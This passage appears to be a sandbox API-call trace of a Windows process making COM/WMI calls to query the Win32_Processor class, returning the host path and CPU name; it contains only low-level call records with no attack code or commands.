Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b38 | out: ppvObject=0x189b38*=0x4b30094) returned 0x0 [0131.520] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189af4 | out: ppvObject=0x189af4*=0x0) returned 0x80004002 [0131.521] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189914 | out: ppvObject=0x189914*=0x0) returned 0x80004002 [0131.521] WbemLocator:IUnknown:AddRef (This=0x4b30094) returned 0x3 [0131.521] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189454 | out: ppvObject=0x189454*=0x0) returned 0x80004002 [0131.521] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189404 | out: ppvObject=0x189404*=0x0) returned 0x80004002 [0131.521] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189410 | out: ppvObject=0x189410*=0x4b2fff4) returned 0x0 [0131.522] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b2fff4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189418 | out: pCid=0x189418*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.522] WbemLocator:IUnknown:Release (This=0x4b2fff4) returned 0x3 [0131.522] CoGetContextToken (in: pToken=0x189470 | out: pToken=0x189470) returned 0x0 [0131.522] CoGetContextToken (in: pToken=0x189878 | out: pToken=0x189878) returned 0x0 [0131.522] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189908 | out: ppvObject=0x189908*=0x4b3007c) returned 0x0 [0131.522] WbemLocator:IRpcOptions:Query (in: This=0x4b3007c, pPrx=0x4b30094, dwProperty=2, pdwValue=0x189930 | out: pdwValue=0x189930) returned 0x80004002 [0131.522] WbemLocator:IUnknown:Release (This=0x4b3007c) returned 0x3 [0131.522] WbemLocator:IUnknown:Release (This=0x4b30094) returned 0x2 [0131.522] CoGetContextToken (in: pToken=0x189e48 | out: pToken=0x189e48) returned 0x0 [0131.522] CoGetContextToken (in: pToken=0x189da8 | out: pToken=0x189da8) returned 0x0 [0131.522] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30094, riid=0x189e78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e74 | out: ppvObject=0x189e74*=0x593da84) returned 0x0 [0131.522] IUnknown:AddRef (This=0x593da84) returned 0x4 [0131.522] IUnknown:Release (This=0x593da84) returned 0x3 [0131.522] IUnknown:Release (This=0x593da84) returned 0x2 [0131.522] WbemLocator:IUnknown:Release (This=0x593d2bc) returned 0x2 [0131.522] SysStringLen (param_1=0x0) returned 0x0 [0131.522] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a134 | out: puCount=0x18a134*=0x2) returned 0x0 [0131.522] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a130*=0x0, pszText=0x0 | out: puBuffLength=0x18a130*=0xf, pszText=0x0) returned 0x0 [0131.522] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a130*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a130*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0131.522] CoGetContextToken (in: pToken=0x189f88 | out: pToken=0x189f88) returned 0x0 [0131.522] IUnknown:AddRef (This=0x593da84) returned 0x3 [0131.522] IEnumWbemClassObject:Clone (in: This=0x593da84, ppEnum=0x18a144 | out: ppEnum=0x18a144*=0x593db4c) returned 0x0 [0131.566] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a008 | out: ppvObject=0x18a008*=0x593db50) returned 0x0 [0131.566] IClientSecurity:QueryBlanket (in: This=0x593db50, pProxy=0x593db4c, pAuthnSvc=0x18a058, pAuthzSvc=0x18a054, pServerPrincName=0x18a04c, pAuthnLevel=0x18a050, pImpLevel=0x18a040, pAuthInfo=0x18a044, pCapabilites=0x18a048 | out: pAuthnSvc=0x18a058*=0xa, pAuthzSvc=0x18a054*=0x0, pServerPrincName=0x18a04c, pAuthnLevel=0x18a050*=0x6, pImpLevel=0x18a040*=0x2, pAuthInfo=0x18a044, pCapabilites=0x18a048*=0x1) returned 0x0 [0131.566] IUnknown:Release (This=0x593db50) returned 0x1 [0131.566] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f610f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ffc | out: ppvObject=0x189ffc*=0x4b30364) returned 0x0 [0131.566] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ff8 | out: ppvObject=0x189ff8*=0x593db50) returned 0x0 [0131.566] IClientSecurity:SetBlanket (This=0x593db50, pProxy=0x593db4c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0131.567] IUnknown:Release (This=0x593db50) returned 0x2 [0131.567] WbemLocator:IUnknown:Release (This=0x4b30364) returned 0x1 [0131.567] CoTaskMemFree (pv=0x4bf9990) [0131.567] IUnknown:QueryInterface (in: This=0x593db4c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189be4 | out: ppvObject=0x189be4*=0x4b30364) returned 0x0 [0131.568] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ba0 | out: ppvObject=0x189ba0*=0x0) returned 0x80004002 [0131.568] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899bc | out: ppvObject=0x1899bc*=0x0) returned 0x80004002 [0131.568] WbemLocator:IUnknown:AddRef (This=0x4b30364) returned 0x3 [0131.569] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894fc | out: ppvObject=0x1894fc*=0x0) returned 0x80004002 [0131.569] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894ac | out: ppvObject=0x1894ac*=0x0) returned 0x80004002 [0131.569] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894b8 | out: ppvObject=0x1894b8*=0x4b302c4) returned 0x0 [0131.569] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x4b302c4, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894c0 | out: pCid=0x1894c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.569] WbemLocator:IUnknown:Release (This=0x4b302c4) returned 0x3 [0131.569] CoGetContextToken (in: pToken=0x189518 | out: pToken=0x189518) returned 0x0 [0131.569] CoGetContextToken (in: pToken=0x189920 | out: pToken=0x189920) returned 0x0 [0131.569] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899b0 | out: ppvObject=0x1899b0*=0x4b3034c) returned 0x0 [0131.569] WbemLocator:IRpcOptions:Query (in: This=0x4b3034c, pPrx=0x4b30364, dwProperty=2, pdwValue=0x1899d8 | out: pdwValue=0x1899d8) returned 0x80004002 [0131.569] WbemLocator:IUnknown:Release (This=0x4b3034c) returned 0x3 [0131.570] WbemLocator:IUnknown:Release (This=0x4b30364) returned 0x2 [0131.570] CoGetContextToken (in: pToken=0x189ef8 | out: pToken=0x189ef8) returned 0x0 [0131.570] CoGetContextToken (in: pToken=0x189e58 | out: pToken=0x189e58) returned 0x0 [0131.570] WbemLocator:IUnknown:QueryInterface (in: This=0x4b30364, riid=0x189f28*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f24 | out: ppvObject=0x189f24*=0x593db4c) returned 0x0 [0131.570] IUnknown:AddRef (This=0x593db4c) returned 0x4 [0131.570] IUnknown:Release (This=0x593db4c) returned 0x3 [0131.570] IUnknown:Release (This=0x593db4c) returned 0x2 [0131.570] IUnknown:Release (This=0x593da84) returned 0x2 [0131.570] SysStringLen (param_1=0x0) returned 0x0 [0131.570] IEnumWbemClassObject:Reset (This=0x593db4c) returned 0x0 [0131.570] CoTaskMemAlloc (cb=0x4) returned 0x4b296d0 [0131.571] IEnumWbemClassObject:Next (in: This=0x593db4c, lTimeout=-1, uCount=0x1, apObjects=0x4b296d0, puReturned=0x26d27fc | out: apObjects=0x4b296d0*=0x593db88, puReturned=0x26d27fc*=0x1) returned 0x0 [0133.940] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1897a0 | out: ppvObject=0x1897a0*=0x593db88) returned 0x0 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x18975c | out: ppvObject=0x18975c*=0x0) returned 0x80004002 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18957c | out: ppvObject=0x18957c*=0x0) returned 0x80004002 [0133.941] IUnknown:AddRef (This=0x593db88) returned 0x3 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890bc | out: ppvObject=0x1890bc*=0x0) returned 0x80004002 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18906c | out: ppvObject=0x18906c*=0x0) returned 0x80004002 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189078 | out: ppvObject=0x189078*=0x593db8c) returned 0x0 [0133.941] IMarshal:GetUnmarshalClass (in: This=0x593db8c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189080 | out: pCid=0x189080*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0133.941] IUnknown:Release (This=0x593db8c) returned 0x3 [0133.941] CoGetContextToken (in: pToken=0x1890d8 | out: pToken=0x1890d8) returned 0x0 [0133.941] CoGetContextToken (in: pToken=0x1894e0 | out: pToken=0x1894e0) returned 0x0 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189570 | out: ppvObject=0x189570*=0x0) returned 0x80004002 [0133.941] IUnknown:Release (This=0x593db88) returned 0x2 [0133.941] CoGetContextToken (in: pToken=0x189ab0 | out: pToken=0x189ab0) returned 0x0 [0133.941] CoGetContextToken (in: pToken=0x189a10 | out: pToken=0x189a10) returned 0x0 [0133.941] IUnknown:QueryInterface (in: This=0x593db88, riid=0x189ae0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189adc | out: ppvObject=0x189adc*=0x593db88) returned 0x0 [0133.941] IUnknown:AddRef (This=0x593db88) returned 0x4 [0133.941] IUnknown:Release (This=0x593db88) returned 0x3 [0133.941] IUnknown:Release (This=0x593db88) returned 0x2 [0133.941] CoTaskMemFree (pv=0x4b296d0) [0133.941] CoGetContextToken (in: pToken=0x189e20 | out: pToken=0x189e20) returned 0x0 [0133.941] IUnknown:AddRef (This=0x593db88) returned 0x3 [0133.942] IWbemClassObject:Get (in: This=0x593db88, wszName="__GENUS", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1b0*=0, plFlavor=0x18a1ac*=0 | out: pVal=0x18a130*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1b0*=3, plFlavor=0x18a1ac*=64) returned 0x0 [0133.942] IWbemClassObject:Get (in: This=0x593db88, wszName="__PATH", lFlags=0, pVal=0x18a114*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a198*=0, plFlavor=0x18a194*=0 | out: pVal=0x18a114*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x18a198*=8, plFlavor=0x18a194*=64) returned 0x0 [0133.942] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x68 [0133.942] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x68 [0133.942] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a140 | out: ppv=0x18a140*=0x75849c) returned 0x0 [0133.942] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a138 | out: pAptType=0x18a138*=1) returned 0x0 [0133.942] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a13c | out: ppvObject=0x18a13c*=0x0) returned 0x80004002 [0133.942] IUnknown:Release (This=0x75849c) returned 0x1 [0133.943] CoGetClassObject (in: rclsid=0x4bf972c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189aa8 | out: ppv=0x189aa8*=0x593d2d0) returned 0x0 [0133.943] WbemDefPath:IUnknown:QueryInterface (in: This=0x593d2d0, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cc0 | out: ppvObject=0x189cc0*=0x0) returned 0x80004002 [0133.943] WbemDefPath:IClassFactory:CreateInstance (in: This=0x593d2d0, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189cd4 | out: ppvObject=0x189cd4*=0x593e140) returned 0x0 [0133.943] WbemDefPath:IUnknown:Release (This=0x593d2d0) returned 0x0 [0133.943] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f4 | out: ppvObject=0x1898f4*=0x593e140) returned 0x0 [0133.943] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898b0 | out: ppvObject=0x1898b0*=0x0) returned 0x80004002 [0133.944] WbemDefPath:IUnknown:AddRef (This=0x593e140) returned 0x3 [0133.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18920c | out: ppvObject=0x18920c*=0x0) returned 0x80004002 [0133.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891bc | out: ppvObject=0x1891bc*=0x0) returned 0x80004002 [0133.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891c8 | out: ppvObject=0x1891c8*=0x4b296d0) returned 0x0 [0133.944] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4b296d0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891d0 | out: pCid=0x1891d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.944] WbemDefPath:IUnknown:Release (This=0x4b296d0) returned 0x3 [0133.944] CoGetContextToken (in: pToken=0x189228 | out: pToken=0x189228) returned 0x0 [0133.944] CoGetContextToken (in: pToken=0x189630 | out: pToken=0x189630) returned 0x0 [0133.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896c0 | out: ppvObject=0x1896c0*=0x0) returned 0x80004002 [0133.944] WbemDefPath:IUnknown:Release (This=0x593e140) returned 0x2 [0133.944] WbemDefPath:IUnknown:Release (This=0x593e140) returned 0x1 [0133.944] CoGetContextToken (in: pToken=0x189fb8 | out: pToken=0x189fb8) returned 0x0 [0133.944] CoGetContextToken (in: pToken=0x189f18 | out: pToken=0x189f18) returned 0x0 [0133.944] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e140, riid=0x189fe8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fe4 | out: ppvObject=0x189fe4*=0x593e140) returned 0x0 [0133.944] WbemDefPath:IUnknown:AddRef (This=0x593e140) returned 0x3 [0133.944] WbemDefPath:IUnknown:Release (This=0x593e140) returned 0x2 [0133.944] WbemDefPath:IWbemPath:SetText (This=0x593e140, uMode=0x4, pszPath="\\\\YKYD69Q\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a16c | out: puCount=0x18a16c*=0x2) returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a168*=0x0, pszText=0x0 | out: puBuffLength=0x18a168*=0xf, pszText=0x0) returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a168*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a168*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a134 | out: puCount=0x18a134*=0x2) returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a130*=0x0, pszText=0x0 | out: puBuffLength=0x18a130*=0xf, pszText=0x0) returned 0x0 [0133.944] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a130*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a130*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.945] IWbemClassObject:Get (in: This=0x593db88, wszName="Name", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26d3024*=0, plFlavor=0x26d3028*=0 | out: pVal=0x18a130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x26d3024*=8, plFlavor=0x26d3028*=0) returned 0x0 [0133.945] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0133.945] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0133.945] IWbemClassObject:Get (in: This=0x593db88, wszName="Name", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26d3024*=8, plFlavor=0x26d3028*=0 | out: pVal=0x18a138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x26d3024*=8, plFlavor=0x26d3028*=0) returned 0x0 [0133.945] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0133.945] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0133.945] CoGetContextToken (in: pToken=0x18a040 | out: pToken=0x18a040) returned 0x0 [0133.945] WbemLocator:IUnknown:Release (This=0x4b30364) returned 0x1 [0133.945] IUnknown:Release (This=0x593db4c) returned 0x0 [0133.964] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a184 | out: puCount=0x18a184*=0x2) returned 0x0 [0133.964] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a180*=0x0, pszText=0x0 | out: puBuffLength=0x18a180*=0xf, pszText=0x0) returned 0x0 [0133.964] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a180*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a180*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.964] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a10c | out: ppv=0x18a10c*=0x75849c) returned 0x0 [0133.965] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a104 | out: pAptType=0x18a104*=1) returned 0x0 [0133.965] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a108 | out: ppvObject=0x18a108*=0x0) returned 